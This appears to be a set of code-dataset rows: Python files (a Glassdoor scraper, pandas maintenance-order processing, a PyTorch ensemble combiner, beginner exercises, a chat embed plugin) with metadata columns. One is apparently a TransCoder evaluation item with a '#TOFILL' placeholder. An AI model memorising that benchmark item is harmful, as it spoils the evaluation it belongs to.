| 0.097376
| 0.077699
| 0.038345
| 0.038345
| 0
| 0.012929
| 0.236347
| 3,241
| 78
| 123
| 41.551282
| 0.787879
| 0.11046
| 0
| 0
| 0
| 0
| 0.228033
| 0.008182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.106383
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd07ae84271209f560ab1e8af1cb6cd4f30c6a7
| 336
|
py
|
Python
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 10
|
2018-09-05T15:20:05.000Z
|
2020-06-01T03:57:08.000Z
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | null | null | null |
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 7
|
2019-06-19T05:44:23.000Z
|
2020-08-30T07:26:13.000Z
|
import socket as sock
import os
IP = sock.gethostname()
CCTV_PORT = 9000
ANDR_PORT = 8000
CUR_DIR = os.getcwd()
REC_DIR = os.path.join(CUR_DIR, "record")
DB_ADDR = "Database server address"
PUSH_ADDR = "Push notification server address"
REG_ID = "Registration ID"
NOTIF_COUNT = 4
QUEUE_SIZE = 30
REC_FILE_NUM = 60
NOTIF_MINIUTE = 10
| 18.666667
| 46
| 0.752976
| 55
| 336
| 4.363636
| 0.727273
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052817
| 0.154762
| 336
| 18
| 47
| 18.666667
| 0.792254
| 0
| 0
| 0
| 0
| 0
| 0.225519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd20fab82d3922fc99876b2d016b1c0bd247c6a
| 7,878
|
py
|
Python
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:48:56.000Z
|
2021-09-08T02:11:07.000Z
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 14:14:47 2019
@author: DK0086
"""
import odema as od
import numpy as np
import pandas as pd
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="Dash")
#######################################################################
# Part 1:
# Connect to the D3 orders database and process the data
tec=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
sql = "SELECT MVW_BW_AVIS.AVIS, MVW_BW_AVIS.DESCRIPTION, MVW_BW_AVIS.TYP, MVW_BW_AVIS.DATE_AVIS, \
MVW_BW_AVIS.ANNEE_DATE_AVIS, MVW_BW_AVIS.MOIS_DATE_AVIS, MVW_BW_AVIS.STATSYS, MVW_BW_AVIS.STAT_UTIL, \
MVW_BW_AVIS.ORDRE, MVW_BW_ORDRES.DATE_CREATION, MVW_BW_AVIS.POSTETECHNIQUE, MVW_BW_AVIS.CODAGE, \
MVW_BW_AVIS.DIV, MVW_BW_AVIS.RESPONSABLE FROM ODEMA.MVW_BW_AVIS MVW_BW_AVIS LEFT OUTER JOIN ODEMA.MVW_BW_ORDRES MVW_BW_ORDRES ON (MVW_BW_AVIS.ORDRE = MVW_BW_ORDRES.ORDRE)"
div=tec.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
localisation= tec.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
tec['longitude']=lon
tec['latitude']=lat
tec['Division']=divv
tec.index = tec['Division']
df = od.read_odema(sql=sql)
test = df[df['DIV'].isin(divv)].copy()
test['IPOT'] = test['STAT_UTIL'].fillna('').str.contains('IPOT')
test['ANOI'] = test['STAT_UTIL'].fillna('').str.contains('ANOI')
test['AINF'] = test['STAT_UTIL'].fillna('').str.contains('AINF')
test["TYP"] = np.where(test['TYP'] == "D3",
np.where(test['IPOT'],
"D3-IPOT",
np.where(test['AINF'],
'D3-AINF',
np.where(test['ANOI'],
'D3-ANOI',
"D3-AUTRE")
)
),
test['TYP'])
R5=['R01','R02','R03','R04','R05']
R10=['R06','R07','R08','R09','R10']
test['R5_et_moins']=test['CODAGE'].isin(R5)
test['R6_et_plus']=test['CODAGE'].isin(R10)
test = test[test['CODAGE'].isin(R5) | test['CODAGE'].isin(R10)]
test = test[test['TYP'].isin(['D2','D4','D9','D3']) | test['TYP'].str.contains('D3')]
test['TYPE_CODE']=test['TYP']
test["Technicien"] = test["DIV"].map(tec["Techniciens"]).fillna("non-assigne")
test["Désignation"] = test["DIV"].map(tec["Désignation"]).fillna("non-assigne")
test["Territoires"] = test["DIV"].map(tec["Territoires"]).fillna("non-assigne")
test["longitude"] = test["DIV"].map(tec["latitude"]).fillna("non-assigne")
test["latitude"] = test["DIV"].map(tec["longitude"]).fillna("non-assigne")
testcopy = test.copy()
df_ordres = testcopy[testcopy['ORDRE'].notnull()].copy()
testcopy["date"] = testcopy["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
testcopy=testcopy[(testcopy.date.dt.year>=2012)& (testcopy.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
testcopy["TYP"] = testcopy["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
testcopy = testcopy.append(df_ordres)
del testcopy["DATE_AVIS"], testcopy["DATE_CREATION"], testcopy['AINF'], testcopy['ANOI'], testcopy['IPOT'], testcopy['R5_et_moins'], testcopy['R6_et_plus']
test["TYP"] = np.where(test['R5_et_moins'],test['TYP']+"-R5",test['TYP']+"-R10")
df_ordres = test[test['ORDRE'].notnull()].copy()
test["date"] = test["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
test=test[(test.date.dt.year>=2012)& (test.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
test["TYP"] = test["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
test = test.append(df_ordres)
del test["DATE_AVIS"], test["DATE_CREATION"],test['AINF'], test['ANOI'], test['IPOT'], test['R5_et_moins'], test['R6_et_plus']
test = test.append(testcopy)
#######################################################################
# Part 2:
# Connect to the 443 orders database and process the data
sql_req_443 = \
"SELECT MVW_BW_ORDRES.TYPE, \
MVW_BW_ORDRES.CODE_NATURE, \
MVW_BW_ORDRES.ORDRE, \
MVW_BW_OPERATIONS_SM_PM.OPERATION_SM_PM, \
MVW_BW_ORDRES.DESIGNATION, \
MVW_BW_OPERATIONS_SM_PM.DESIGNATION_OPERATION_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUTS_UTIL_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUT_OP_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_CONF_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_LANC_SM_PM, \
MVW_BW_ORDRES.DIVISION_GRPE_GESTION, \
MVW_BW_ORDRES.DIVISION_POSTE_RESP, \
MVW_BW_ORDRES.POSTERESP \
FROM ODEMA.MVW_BW_ORDRES \
INNER JOIN ODEMA.MVW_BW_OPERATIONS_SM_PM \
ON (MVW_BW_ORDRES.ORDRE = MVW_BW_OPERATIONS_SM_PM.ORDRE_SM_PM) \
WHERE(MVW_BW_ORDRES.CODE_NATURE = '443')"
geolocator = Nominatim(user_agent="Dash")
df443 = od.read_odema(sql=sql_req_443)
df=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
div=df.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
df['Division']=divv
localisation= df.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
df['longitude']=lon
df['latitude']=lat
df.index = df['Division']
df443['chk'] = df443['DESIGNATION_OPERATION_SM_PM'].fillna('').str.lower().str.replace('é','e')
df443['TYPE_CODE'] = df443['TYPE'] + '-' + df443['CODE_NATURE']
df443['TYPE_CODE'] = np.where(df443['chk'].fillna("").str.contains('diagnostic')
,df443['TYPE_CODE'] + '-' + 'Diagnostic'
,df443['TYPE_CODE'] + '-' + 'Autre'
)
closed = df443[df443['DATE_STATUT_CONF_SM_PM'].notnull()].copy()
df443 = df443[df443['DATE_STATUT_LANC_SM_PM'].notnull()]  # should never contain nulls, but filter anyway just to be safe
closed['date'] = closed['DATE_STATUT_CONF_SM_PM']
df443['date'] = df443['DATE_STATUT_LANC_SM_PM']
lst_champs = ['TYPE_CODE','TYPE','CODE_NATURE','ORDRE','DESIGNATION','OPERATION_SM_PM','DESIGNATION_OPERATION_SM_PM','date', 'DIVISION_GRPE_GESTION','DIVISION_POSTE_RESP']
closed = closed[lst_champs]
df443 = df443[lst_champs]
df443['TYP'] = df443['TYPE_CODE'] + '-lances'
closed['TYP'] = closed['TYPE_CODE'] + '-confirmes'
df443 = df443.append(closed)
df443['DIV'] = df443['DIVISION_POSTE_RESP']
df443["Technicien"] = df443["DIV"].map(df["Techniciens"]).fillna("non-assigne")
df443["Désignation"] = df443["DIV"].map(df["Désignation"]).fillna("non-assigne")
df443["Territoires"] = df443["DIV"].map(df["Territoires"]).fillna("non-assigne")
df443["longitude"] = df443["DIV"].map(df["latitude"]).fillna("non-assigne")
df443["latitude"] = df443["DIV"].map(df["longitude"]).fillna("non-assigne")
df443["TYP_STATUS"] = df443["TYP"]
df443['433'] = df443['CODE_NATURE'].fillna('').str.contains('433')
del closed
#tot=pd.concat([df443, test], ignore_index=True)
#tot.to_csv('tot.csv',sep=";")
| 37.514286
| 180
| 0.621351
| 1,058
| 7,878
| 4.405482
| 0.190926
| 0.040764
| 0.030895
| 0.029178
| 0.398198
| 0.304012
| 0.250161
| 0.222055
| 0.214117
| 0.150611
| 0
| 0.039988
| 0.184184
| 7,878
| 209
| 181
| 37.69378
| 0.685234
| 0.046839
| 0
| 0.248366
| 0
| 0.006536
| 0.201092
| 0.030668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.065359
| 0
| 0.065359
| 0.013072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd2843c7e52da7b669cdb447daf485dad48b407
| 4,398
|
py
|
Python
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 9
|
2019-05-29T12:53:03.000Z
|
2020-07-01T13:26:12.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2018-07-20T00:23:46.000Z
|
2018-10-16T20:37:34.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2019-03-15T13:43:36.000Z
|
2020-04-27T00:15:53.000Z
|
import GlassdoorScrapeCore.GlassdoorScrapeUtilities as Ut
def decode_experience(html_string):
if html_string.find("Positive", 0) != -1:
return "Positive Experience"
elif html_string.find("Neutral", 0) != -1:
return "Neutral Experience"
elif html_string.find("Negative", 0) != -1:
return "Negative Experience"
return ""
def decode_offer(html_string):
if html_string.find("Accepted", 0) != -1:
return "Accepted Offer"
elif html_string.find("Declined", 0) != -1:
return "Declined Offer"
elif html_string.find("No Offer", 0) != -1:
return "No Offer"
return ""
def decode_difficulty(html_string):
if html_string.find("Hard", 0) != -1:
return "Hard"
elif html_string.find("Average", 0) != -1:
return "Average"
elif html_string.find("Easy", 0) != -1:
return "Easy"
elif html_string.find("Difficult", 0) != -1:
return "Difficult"
return ""
def decode_getting_interview(html_string):
html_string = html_string.upper()
if html_string.find(" ONLINE ", 0) != -1:
return "Online"
elif html_string.find("EMPLOY", 0) != -1:
return "Employee Referral"
elif html_string.find("RECRUITING", 0) != -1:
return "Campus Recruiting"
elif html_string.find("CAMPUS", 0) != -1:
return "Campus Recruiting"
return ""
def parse_html(html_string):
company_name = Ut.get_string_between(html_string, "</script><title>", "Interview Questions |", "")
print("Company Name: " + company_name)
interview_list = Ut.get_list_of_substrings(html_string, "<li class=' empReview cf ' id='InterviewReview", "</li>")
if len(interview_list) == 0:
interview_list = Ut.get_list_of_substrings(html_string,
"<li class=' lockedReview empReview cf ' id='InterviewReview_",
"</li>")
print("Interviews to parse: " + str(len(interview_list)))
# Each will have a list appended
output_listing = []
for main_list in range(0, len(interview_list)):
row = interview_list[main_list]
# Parse the current listing
row_list = []
# Company Name
_str = company_name
row_list.append(_str)
# Interview Date
_str = Ut.get_string_between(row, "datetime=\"", "\">", "")
row_list.append(_str)
# Title (Analyst Interview)
_str = Ut.get_string_between(row, "<span class='reviewer'>", "</span>", "")
_str = _str.strip()
row_list.append(_str)
# Experience
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Application</p>", "")
experience = experience.strip()
if len(experience) == 0:
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Interview</p>", "")
_str = decode_experience(experience)
row_list.append(_str)
# Offer
_str = decode_offer(experience)
row_list.append(_str)
# Difficulty
_str = decode_difficulty(experience)
row_list.append(_str)
# GettingInterview
_Application = Ut.get_string_between(row,
"<p class='applicationDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
_current = decode_getting_interview(_Application)
row_list.append(_current)
# Application
row_list.append(_Application)
# Interview (description/verbatim)
_str = Ut.get_string_between(row,
"<p class='interviewDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
row_list.append(_str)
# Interview (Questions)
_str = Ut.get_string_between(row,
"<span class='interviewQuestion noPadVert truncateThis wrapToggleStr ' data-truncate-words='70'>",
"class", "", True)
row_list.append(_str)
# append the list
output_listing.append(row_list)
return output_listing
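Quick sanity checks for the decode helpers above; the inputs are made-up fragments of the HTML they scan:
assert decode_experience("flex-grid Positive Experience badge") == "Positive Experience"
assert decode_offer("No Offer yet for this role") == "No Offer"
assert decode_difficulty("rated Average by candidates") == "Average"
assert decode_getting_interview("I applied online via the site") == "Online"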
| 35.467742
| 135
| 0.571851
| 460
| 4,398
| 5.234783
| 0.226087
| 0.099668
| 0.081395
| 0.074751
| 0.339286
| 0.19892
| 0.155316
| 0.13289
| 0.105482
| 0.105482
| 0
| 0.01083
| 0.307185
| 4,398
| 123
| 136
| 35.756098
| 0.779455
| 0.054116
| 0
| 0.232558
| 0
| 0
| 0.202846
| 0.023396
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05814
| false
| 0
| 0.011628
| 0
| 0.290698
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd5a7231c757b5d59c10582041a64bcee61c37a
| 4,155
|
py
|
Python
|
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | 1
|
2021-02-28T12:52:55.000Z
|
2021-02-28T12:52:55.000Z
|
# Day 12: Functions
# Exercises
# Define four functions: add, subtract, divide, and multiply. Each function should take two arguments, and they should print the result of the arithmetic operation indicated by the function name.
# When order matters for an operation, the first argument should be treated as the left operand, and the second argument should be treated as the right operand.
# For example, if the user passes in 6 and 2 to subtract, the result should be 4, not -4.
# You should also make sure that the user can’t pass in 0 as the second argument for divide. If the user provides 0, you should print a warning instead of calculating their division.
def add(firstvalue, secondvalue):
print(firstvalue + secondvalue)
def subtract(firstvalue, secondvalue):
print(firstvalue - secondvalue)
def divide(firstvalue, secondvalue):
    if secondvalue == 0:
        print("You can't do that!")  # warn instead of dividing, per the exercise
        return
    print(firstvalue / secondvalue)
def multiply(firstvalue, secondvalue):
print(firstvalue * secondvalue)
# Main (input/menu)
firstvalue = int(input("Enter first value: "))
secondvalue = int(input("Enter second value: "))
userchoice = input("\nWhat operation do you wish to perform?\n1. Add\n2. Subtract\n3. Divide\n4. Multiply\nEnter choice: ")
if userchoice == "1":
add(firstvalue, secondvalue)
elif userchoice == "2":
subtract(firstvalue, secondvalue)
elif userchoice == "3":
divide(firstvalue, secondvalue)
elif userchoice == "4":
multiply(firstvalue, secondvalue)
else:
print("Invalid input, try again.")
# Define a function called print_show_info that has a single parameter. The argument passed to it will be a dictionary with some information about a T.V. show. For example:
# The print_show_info function should print the information stored in the dictionary, in a nice way. For example:
# Breaking Bad (2008) - 5 seasons - Remember you must define your function before calling it!
tv_show = {
"title": "Breaking Bad",
"seasons": 5,
"initial_release": 2008
}
def print_show_info(show):
print(f"{show['title']} ({show['initial_release']}) - {show['seasons']} seasons")
print_show_info(tv_show)
# Below you’ll find a list containing details about multiple TV series.
series = [
{"title": "Breaking Bad", "seasons": 5, "initial_release": 2008},
{"title": "Fargo", "seasons": 4, "initial_release": 2014},
{"title": "Firefly", "seasons": 1, "initial_release": 2002},
{"title": "Rick and Morty", "seasons": 4, "initial_release": 2013},
{"title": "True Detective", "seasons": 3, "initial_release": 2014},
{"title": "Westworld", "seasons": 3, "initial_release": 2016},
]
# Use your function, print_show_info, and a for loop, to iterate over the series list, and call your function once for each iteration, passing in each dictionary.
# You should end up with each series printed in the appropriate format.
for show in series:
print_show_info(show)
# Create a function to test if a word is a palindrome. A palindrome is a string of characters that are identical whether read forwards or backwards. For example, “was it a car or a cat I saw” is a palindrome.
# In the day 7 project, we saw a number of ways to reverse a sequence, and you can use this to verify whether a string is the same backwards as it is in its original order. You can also use a slicing approach.
# Once you’ve found whether or not a word is a palindrome, you should print the result to the user. Make sure to clean up the argument provided to the function. We should be stripping whitespace from both
# ends of the string, and we should convert it all to the same case, just in case we’re dealing with a name, like “Hannah”.
# No module-level variables are needed here; the function below uses its own locals.
def palindrome_check():
userword = list(input("Enter the word you want to check: ").strip().lower())
reverseword = userword[0:]
reverseword.reverse()
    if reverseword == userword:
        print("That is indeed a palindrome.")
    else:
        print("That is not a palindrome.")
palindrome_check()
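The slicing approach mentioned in the comments above, as a compact alternative; is_palindrome is a hypothetical name, and it applies the same strip/lower cleanup:
def is_palindrome(word: str) -> bool:
    cleaned = word.strip().lower()
    return cleaned == cleaned[::-1]  # a palindrome equals its own reverse

print(is_palindrome("Hannah"))  # True
print(is_palindrome("Fargo"))   # False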
| 43.736842
| 210
| 0.726113
| 618
| 4,155
| 4.843042
| 0.368932
| 0.084196
| 0.026061
| 0.036084
| 0.107918
| 0.080187
| 0.028065
| 0.028065
| 0
| 0
| 0
| 0.017317
| 0.180024
| 4,155
| 95
| 211
| 43.736842
| 0.861168
| 0.505415
| 0
| 0.037037
| 0
| 0.018519
| 0.324006
| 0.013255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb5dfba5c5533938d6a17b1b05c8c187bd4dad1b
| 3,450
|
py
|
Python
|
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
"""
Contains the trainable sub-network of an ensemble classifier.
Handles calling the training and evaluation.
"""
import torch
import torch.nn as nn
import torch.optim as optim
from matplotlib.pyplot import show
from utility.fusion_functions import (train_nn_combiner_model,
test_nn_combiner)
from definitions import (MODELS_TRAIN_OUTPUTS_FILE, MODELS_VAL_OUTPUTS_FILE,
MODELS_TEST_OUTPUTS_FILE,
BEST_COMBINER_MODEL)
from utility.utilities import FusionData, Features
class CombinerModel(nn.Module):
def __init__(self):
super(CombinerModel, self).__init__()
self.input_dim = 40 # Label count * base model count
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
nn.Linear(32, 10)
)
def forward(self, x):
x = x.flatten(start_dim=1)
x = self.model(x)
return x
if __name__ == '__main__':
run_train = True
run_test = True
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print(device)
model_ensemble = CombinerModel()
if run_train:
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000020)
epochs = 100
batch_size = 32
feature_train = Features(feature_file=MODELS_TRAIN_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_train = FusionData(features=[feature_train], do_reshape=False)
feature_val = Features(feature_file=MODELS_VAL_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_val = FusionData(features=[feature_val], do_reshape=False)
train_nn_combiner_model(model=model_ensemble,
optimizer=optimizer,
train_data=data_train.get_data(),
val_data=data_val.get_data(),
best_model=BEST_COMBINER_MODEL,
device=device,
epochs=epochs,
batch_size=batch_size)
if run_test:
feature_test = Features(feature_file=MODELS_TEST_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_test = FusionData(features=[feature_test], do_reshape=False)
model_ensemble.load_state_dict(torch.load(BEST_COMBINER_MODEL))
model_ensemble.eval()
test_nn_combiner(model=model_ensemble,
test_data=data_test.get_data(),
device=device,
verbose=True)
show()
"""
with logits, lr=0.000015, test: 0.872 (epoch 87) batchnormed, 0.871 without
with probabilities, lr=0.000025, test: 0.872 (epoch 46) batchnormed, 0.849 without
with softmax of probabilities, lr=0.000025 test: 0.872 (epoch 46) batchnormed, 0.814 without higher lr
with softmax of logits, lr=0.000020, 0.865, (epoch 46) batchnormed,
with logits:
test: 0.872 val: 0.892 val_loss: 0.2937 avg: 86.61% test_loss: 0.3840
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000015)
epochs = 92 # (87), 0.871 without batchnorm
batch_size = 32
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
#nn.Dropout(0.5),
nn.Linear(32, 10)
)
"""
| 35.9375
| 102
| 0.595072
| 416
| 3,450
| 4.6875
| 0.307692
| 0.046667
| 0.01641
| 0.038462
| 0.238462
| 0.201538
| 0.201538
| 0.163077
| 0.117949
| 0.117949
| 0
| 0.058502
| 0.311304
| 3,450
| 95
| 103
| 36.315789
| 0.762205
| 0.04
| 0
| 0.084746
| 0
| 0
| 0.009023
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.118644
| 0
| 0.186441
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb63df222835f6eb78ba3c732e704619ca12b613
| 899
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( str ) :
n = len ( str )
for i in range ( n ) :
if ( str [ i ] != 'a' ) :
break
if ( i * 2 != n ) :
return False
for j in range ( i , n ) :
if ( str [ j ] != 'b' ) :
return False
return True
#TOFILL
if __name__ == '__main__':
param = [
('ba',),
('aabb',),
('abab',),
('aaabb',),
('aabbb',),
('abaabbaa',),
('abaababb',),
('bbaa',),
('11001000',),
('ZWXv te',)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param)))
| 23.051282
| 64
| 0.506118
| 113
| 899
| 3.876106
| 0.584071
| 0.054795
| 0.027397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024793
| 0.32703
| 899
| 39
| 65
| 23.051282
| 0.699174
| 0.205784
| 0
| 0.068966
| 0
| 0
| 0.114569
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0
| 0
| 0.137931
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb66ace576783c81b7f71f58e215ed9554b532e3
| 1,249
|
py
|
Python
|
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
# Copyright 2022 iiPython
# Modules
import time
# Initialization
embed_size = 45
# Plugin class
class EmbedPlugins(object):
def __init__(self, eventmgr) -> None:
self.meta = {
"name": "Embeds",
"author": "iiPython",
"id": "embeds"
}
self.eventmgr = eventmgr
def center(self, line: str) -> str:
padding = round((embed_size - len(line)) / 2)
return (" " * padding) + line + (" " * padding)
    def normalize(self, lines: list, tags: str) -> list:
new, longest = [], len(max(lines, key = len))
for line in lines:
new.append(f"{tags}" + line + (" " * (longest - len(line))))
return new
def on_call(self, args: list) -> str:
try:
title, body = args[0], args[1]
except IndexError:
return self.print("usage: /embeds <title> <body>")
# Make footer
footer = time.strftime("%I:%M %p · %Z")
# Construct embed
embed_lines = [self.center(line) for line in [title] + [body[i:i + (embed_size - 10)] for i in range(0, len(body), embed_size - 10)] + ["", footer]]
return "\n".join(self.normalize(embed_lines, args[2] if len(args) > 2 else "[bglblack]"))
| 29.046512
| 156
| 0.542834
| 153
| 1,249
| 4.366013
